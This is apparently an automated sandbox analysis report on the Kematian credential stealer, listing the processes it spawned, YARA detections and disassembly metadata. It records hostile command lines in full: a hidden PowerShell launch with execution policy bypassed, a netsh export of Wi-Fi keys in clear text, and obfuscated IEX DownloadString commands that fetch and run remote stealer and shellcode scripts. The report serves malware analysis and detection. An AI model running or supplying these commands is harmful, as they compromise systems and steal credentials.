                                        Start time:00:26:26
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:powershell -noprofile -executionpolicy bypass -WindowStyle hidden -file kematian.ps1
                                        Imagebase:0x7ff788560000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000028.00000002.2928167979.0000017EE79DB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Has exited:false

                                        Target ID:41
                                        Start time:00:26:28
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                        Imagebase:0x7ff693ab0000
                                        File size:496'640 bytes
                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                        Has elevated privileges:true
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:43
                                        Start time:00:26:34
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\netsh.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user\AppData\Local\Temp\wifi key=clear
                                        Imagebase:0x7ff749760000
                                        File size:96'768 bytes
                                        MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:44
                                        Start time:00:26:36
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1'))
                                        Imagebase:0x7ff788560000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_KematianStealer, Description: Yara detected Kematian Stealer, Source: 0000002C.00000002.2105443989.00000201CC037000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_KematianStealer, Description: Yara detected Kematian Stealer, Source: 0000002C.00000002.2105443989.00000201CC032000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Has exited:true

                                        Target ID:45
                                        Start time:00:26:38
                                        Start date:05/07/2024
                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.cmdline"
                                        Imagebase:0x7ff7735b0000
                                        File size:2'759'232 bytes
                                        MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:46
                                        Start time:00:26:39
                                        Start date:05/07/2024
                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4A61.tmp" "c:\Users\user\AppData\Local\Temp\hvw5rqqp\CSC90E3CD70A79D45AA9723BEFA972FDA5B.TMP"
                                        Imagebase:0x7ff752310000
                                        File size:52'744 bytes
                                        MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:48
                                        Start time:00:26:53
                                        Start date:05/07/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1'))
                                        Imagebase:0x7ff788560000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:Go lang
                                        Yara matches:
                                        • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000030.00000002.2641864548.000002A8730B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000030.00000002.2414199980.000002A86A80A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        Has exited:true


                                          Execution Graph

                                          Execution Coverage:1%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:56.5%
                                          Total number of Nodes:46
                                          Total number of Limit Nodes:12
                                          execution_graph (node and edge listing omitted). API nodes present in the graph: NtCreateSection, NtMapViewOfSection, NtUnmapViewOfSection, LoadLibraryA, CreateThread.

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph for function 2a87347d4bf (basic-block and edge listing omitted). API nodes: NtCreateSection, NtMapViewOfSection, NtUnmapViewOfSection; internal calls to 2a87347ec18, 2a87347ec38, 2a87347e408, 2a87347e4f0, 2a87347c89c, 2a87347ec54, 2a87347e1ac.
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000030.00000002.2641864548.000002A8730B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002A8730B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_48_2_2a8730b0000_powershell.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Section$View$CreateUnmap
                                          • String ID:
                                          • API String ID: 3892452295-0
                                          • Opcode ID: c2efb0d189a3bd31cd61209ebe84e47c4058fee6307bf13583288c5a38d8a1c7
                                          • Instruction ID: 3377fa88edc0b516e93ed73cf476919b359784fb85922ea3cfa4b35883f839bc
                                          • Opcode Fuzzy Hash: c2efb0d189a3bd31cd61209ebe84e47c4058fee6307bf13583288c5a38d8a1c7
                                          • Instruction Fuzzy Hash: 7862A635758B588BDF69DF28CC897A9B3D1FBAA310F28455DD88AC7181DE30E9428743
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000030.00000002.2641864548.000002A8730B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002A8730B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_48_2_2a8730b0000_powershell.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: SectionView
                                          • String ID:
                                          • API String ID: 1323581903-0
                                          • Opcode ID: 24a29ad4ea641c494988e496a702fc89e757b0270e033edaa018779348e7e818
                                          • Instruction ID: 0e9c5008545104eaad1c442a7662a2ecf279868c712fdd3f8003ffd29b0c4c54
                                          • Opcode Fuzzy Hash: 24a29ad4ea641c494988e496a702fc89e757b0270e033edaa018779348e7e818
                                          • Instruction Fuzzy Hash: 99B1B635358B588BDF6CDF18C8897A9B3E1FBAA310F28456DD48AC7251DE34E5428B43

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph for function 2a87347e408 (basic-block and edge listing omitted). API node: LoadLibraryA; internal call to 2a87347ec74.
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000030.00000002.2641864548.000002A8730B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002A8730B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_48_2_2a8730b0000_powershell.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: l
                                          • API String ID: 1029625771-2517025534
                                          • Opcode ID: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
                                          • Instruction ID: e894bdb677c4d090e5c7d8d72668f6369d788aa47d4bbb4f2201e5c919f848c0
                                          • Opcode Fuzzy Hash: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
                                          • Instruction Fuzzy Hash: 6031A224658A954FE759DB2CC448B21FBD5FBAA308F2856ECC1CAC7192DF30D8868707

                                          Control-flow Graph

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000030.00000002.2799239600.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_48_2_7ffd9bac0000_powershell.jbxd
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          • Opcode ID: d37b4cc9f0bcb00f70d4dce053105fd26c24221271bd64ca771183574e86c42d
                                          • Instruction ID: 1e289aaeadf1cd8f6c0a1c054aadb4193ffc3e4b38e73b75fa8d89502dab4c02
                                          • Opcode Fuzzy Hash: d37b4cc9f0bcb00f70d4dce053105fd26c24221271bd64ca771183574e86c42d
                                          • Instruction Fuzzy Hash: 54413C3090D7CD5FDB5AAB6898156F57FE0EF16325F0401AFE09DC3193CA686852C786

                                          Control-flow Graph

                                          Memory Dump Source
                                          • Source File: 00000030.00000002.2801642264.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_48_2_7ffd9bb90000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 73348b923422b64b9086354f9e5eeed2889ba8b2b02ad1dd285c23a6d608fbee
                                          • Instruction ID: 64ffcf4b72e747276612b3bdf411927bdf11b525838b51bb23d7af33ea5f53a9
                                          • Opcode Fuzzy Hash: 73348b923422b64b9086354f9e5eeed2889ba8b2b02ad1dd285c23a6d608fbee
                                          • Instruction Fuzzy Hash: 1CD12662B0FAC90FE7A6976888755B57FE0EF56618B4A00FFD089CB1E3D9089D058342

                                          Control-flow Graph

                                          Memory Dump Source
                                          • Source File: 00000030.00000002.2801642264.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_48_2_7ffd9bb90000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a69116166db43050d7a13092acaee5913cf5b73c9e08b891f51885dcd0d10501
                                          • Instruction ID: 2f2e347628c0b9092ddf190b72b2dbfd7c95f66424bfb205929f16e4518e829c
                                          • Opcode Fuzzy Hash: a69116166db43050d7a13092acaee5913cf5b73c9e08b891f51885dcd0d10501
                                          • Instruction Fuzzy Hash: 0531D662F0FA8E0BF7B566A894B52B866C1FF55A5CB9A00BAD55DC31E3EC0C6D014302

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000030.00000002.2739985889.000002A873FB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002A873FB1000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_48_2_2a873fb1000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 2-by$expa$nd 3$te k
                                          • API String ID: 0-3581043453
                                          • Opcode ID: 9face80e684f4cb5f1989056d9a63c8b1ed90f8923185a9084afd145ce759664
                                          • Instruction ID: 8fb54e6572e0e1581ffbdb5ee120615a8efed1704c30b4fe7e6d23adcc25d203
                                          • Opcode Fuzzy Hash: 9face80e684f4cb5f1989056d9a63c8b1ed90f8923185a9084afd145ce759664
                                          • Instruction Fuzzy Hash: F0C1532493AB4C1EE3C3BA298501253F344FE6E54DA20D366DE57B8491EB1FE88F610C
                                          Memory Dump Source
                                          • Source File: 00000030.00000002.2739985889.000002A873FB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002A873FB1000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_48_2_2a873fb1000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d7deb9fe0b22ac6d43d1f22b99f431206e1cdecd252482b38c830d55032bd970
                                          • Instruction ID: c37f1436afb49693ccaa014a36ac7fd93dfd12df8a415c527e3dd3c46e38db4d
                                          • Opcode Fuzzy Hash: d7deb9fe0b22ac6d43d1f22b99f431206e1cdecd252482b38c830d55032bd970
                                          • Instruction Fuzzy Hash: F4C08064D556594AF391C7544804778F9C0D785351F54C099D145C03E1DAADD1C0A145

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000030.00000002.2739985889.000002A873FB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 000002A873FB1000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_48_2_2a873fb1000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: debu$debu$debu$debu$debu$l655$runt
                                          • API String ID: 0-120812121
                                          • Opcode ID: c56935a0eb90631a5f2efc0543069aa2723d47141d10be997a949776721356df
                                          • Instruction ID: 485a7d541e875942e129218495a3a6fdd4cca73346f226d068ea73c2821c7f59
                                          • Opcode Fuzzy Hash: c56935a0eb90631a5f2efc0543069aa2723d47141d10be997a949776721356df
                                          • Instruction Fuzzy Hash: CDA1A578644D049FEB94DF68C89CB26B2E5FB5B388F74C49AD09AD71A5DE618C80C703